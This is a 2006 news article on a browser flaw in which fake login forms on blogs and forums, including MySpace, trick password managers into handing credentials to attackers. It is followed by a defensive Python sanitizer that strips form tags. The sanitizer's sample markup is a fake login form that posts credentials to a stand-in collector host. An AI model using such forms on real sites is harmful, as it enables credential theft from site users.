Firefox and IE7 vulnerable to password-stealing attack

MySpace targeted


23 November 2006 13:03 GMT / By Stuart Miles

Firefox 2 and Microsoft's Internet Explorer 7 web browsers have been found to be vulnerable to a flaw that could allow attackers to steal passwords.

Called the Reverse Cross Site Request (RCSR) vulnerability by its discoverer, Robert Chapin, the flaw allows attackers to obtain users' usernames and passwords by presenting them with a fake login form.

Firefox Password Manager will automatically enter any saved passwords and usernames into the form, which, it seems, is part of the problem.

The Password Manager component of Firefox can be exploited to send a username and password combination to an attacker's computer without the user's knowledge.

"This may be a new breed of phishing attack unique to websites with user-contributed HTML", said Chapin on a Mozilla bug reporting site.

According to Chapin, "Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum websites at trusted addresses".

According to Chapin, Microsoft is already "aware of the issue".

Before you give up using the Internet altogether, note that for the attack to work the user has to follow a malicious link or form button.

"Webmasters have little recourse against stopping the attacks from happening. The only effective measure would be to remove all

elements in user-contributed HTML", Chapin said.

An exploit for this flaw has already been seen on social networking site MySpace. A recent large-scale attack using RCSR targeted the site's users and was first reported by Netcraft on 27/10/2006. That incident involved fake login forms on the MySpace website inviting users to type in their username and password.

The bad news is that the vulnerability could affect anyone using a blog or forum that allows user-generated HTML code to be added, according to Chapin.
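For webmasters of such sites, the sketch below shows one way to strip form-related elements from user-contributed HTML before it is published, so a fake login form like the one described above cannot be rendered. It is an added example, not code from Chapin's report or from any site named here; the tag list, the names `FormStripper` and `strip_forms`, and the sample markup (including `collector.example`) are assumptions made for illustration, and it complements rather than replaces a site's existing script filtering.

```python
from html import escape
from html.parser import HTMLParser

# Assumed list of elements that can build or submit a form.
FORM_TAGS = {"form", "input", "button", "select", "option", "optgroup",
             "textarea", "label", "fieldset", "legend", "isindex"}


class FormStripper(HTMLParser):
    """Re-serialise user-contributed HTML, dropping every form-related tag."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []      # sanitised output fragments
        self.removed = []  # dropped tags, for logging or moderation review

    def handle_starttag(self, tag, attrs):
        # Oddly named tags (e.g. "x<form") are dropped as well, to be safe.
        if tag in FORM_TAGS or not tag.isalnum():
            self.removed.append(tag)
            return
        rendered = "".join(
            f' {escape(name)}="{escape(value or "")}"' for name, value in attrs)
        self.out.append(f"<{tag}{rendered}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # "<br/>" is re-emitted as "<br>"

    def handle_endtag(self, tag):
        if tag not in FORM_TAGS and tag.isalnum():
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Escape text so an unterminated "<input" cannot survive as markup.
        self.out.append(escape(data, quote=False))


def strip_forms(user_html):
    """Return (sanitised_html, removed_tags) for one piece of user HTML."""
    parser = FormStripper()
    parser.feed(user_html)
    parser.close()
    return "".join(parser.out), parser.removed


# Constructed sample: a profile comment carrying a fake login form.
SAMPLE = ('<p>Session expired.</p><FORM action="https://collector.example/x">'
          '<input name="user"><input type="password" name="pass">'
          '<button>Log in</button></form><b>bye</b>')
print(strip_forms(SAMPLE))
```

A non-empty `removed` list is also a useful signal for moderation, since ordinary comments and profile text rarely need form controls.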

More information can be found on the link below.
